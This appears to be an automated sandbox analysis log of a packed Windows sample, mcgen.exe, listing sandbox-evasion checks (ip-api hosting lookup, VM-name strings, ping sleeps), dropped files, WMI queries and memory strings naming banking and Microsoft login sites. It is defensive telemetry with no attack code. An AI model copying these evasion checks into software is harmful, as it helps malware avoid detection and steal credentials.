Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8270	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1018	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8808	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 592	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3409
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 863
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3542
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3923
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1380
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2769
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2746
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2678
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1493

Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.dll	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\mcgen.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI32122\python313.dll	Jump to dropped file

Source: C:\Users\user\Desktop\mcgen.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-18101

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372	Thread sleep count: 8270 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492	Thread sleep count: 1018 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6136	Thread sleep count: 8808 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2832	Thread sleep count: 592 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep count: 3409 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 524	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep count: 268 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5920	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep count: 863 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7788	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7576	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792	Thread sleep count: 3923 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792	Thread sleep count: 1380 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132	Thread sleep count: 2769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076	Thread sleep count: 309 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7960	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7748	Thread sleep count: 2746 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep count: 1238 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544	Thread sleep count: 2678 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7588	Thread sleep count: 1493 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF6B9F183B0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F192F0 FindFirstFileExW,FindClose,	0_2_00007FF6B9F192F0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6B9F318E4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF695CF46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D388E0 FindFirstFileExA,	103_2_00007FF695D388E0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF695CEE21C

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 2_2_00007FFD940E1240 GetSystemInfo,

2_2_00007FFD940E1240

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mcgen.exe, 00000002.00000002.2525689831.000002C54E090000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: HgfS_IFCHR
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 6dbf5vmware
Source: getmac.exe, 0000004C.00000003.2287247169.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000002.2290374509.0000022C1929F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C1929B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"t
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f01vmsrvc
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: If2vmusrvc
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: mcgen.exe, 00000002.00000003.2279385249.000002C54EA78000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2278631503.000002C54EBA4000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2406816664.000002C54F863000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: dytesqemu-ga
Source: getmac.exe, 0000004C.00000002.2290574092.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2286655465.0000022C192DA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287617818.0000022C192DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: getmac.exe, 0000004C.00000002.2290526325.0000022C192C7000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287247169.0000022C192C5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2285677305.0000022C192C1000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004C.00000003.2287859441.0000022C192C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FAED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
